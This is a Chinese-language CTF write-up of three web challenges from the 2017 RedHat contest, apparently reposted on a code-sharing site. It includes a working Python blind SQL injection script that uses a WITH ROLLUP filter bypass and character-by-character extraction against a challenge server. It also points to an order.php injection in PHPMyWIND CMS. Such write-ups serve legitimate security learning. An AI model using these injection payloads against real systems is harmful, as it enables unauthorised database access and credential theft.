首页 > 代码库 > 2017 redhat web writeup

2017 redhat web writeup

2017 RedHat Web writeup
1、thinkseeker
2、PHPMyWIND
3、后台

2017 RedHat Web writeup

1、thinkseeker

这题考两个点
1、用with rollup过前面两个if
2、用盲注找到flag
关于第一点在实验吧有原题:http://www.shiyanbar.com/ctf/1940
过滤方法稍有不同,用操作符代替关键字即可。token使用变量覆盖就可以。
第二点就是infoid这个参数有盲注,跑脚本可以拿到flag。
这是脚本:

  1. # -*- coding:utf-8 -*-
  2. import requests
  3. string = ‘‘
  4. for i in range(1,63):
  5. for j in range(32,127):
  6. url="http://106.75.117.4:3083/?token=21232f297a57a5a743894a0e4a801fc3&infoid=1%0a%26%26%0aascii(substr((select%0agroup_concat(flag)%0afrom%0aflag)from({})for(1)))={}&userid=1%0a||%0a1%0agroup%0aby%0apassword%0awith%0arollup%0alimit%0a1%0aoffset%0a1&password=".format(i,j)
  7. s=requests.get(url=url)
  8. content=s.content
  9. print i,j
  10. # 判断
  11. if "error sql!" not in content:
  12. string+=chr(j)
  13. break
  14. print string

最后答案:
技术分享
还是SQL注入做的少了,很多语句都不会写了。

2、PHPMyWIND

这题漏洞太多了,随便一扫出了3个xss,我就执着的认为就是XSS的题目,一度以为是自己的XSS平台出问题了,其实就是order.php下面有个注入,参考文章http://0day5.com/archives/1442/
注意设置一下cookie防止跳转
技术分享
解开md5之后登陆管理员,找到这个
技术分享
访问拿到flag

3、后台

脑洞题,密码就是日期20170506
技术分享
其实根目录下还有一个flag.php,我一开始以为是要读这个文件,,

2017 redhat web writeup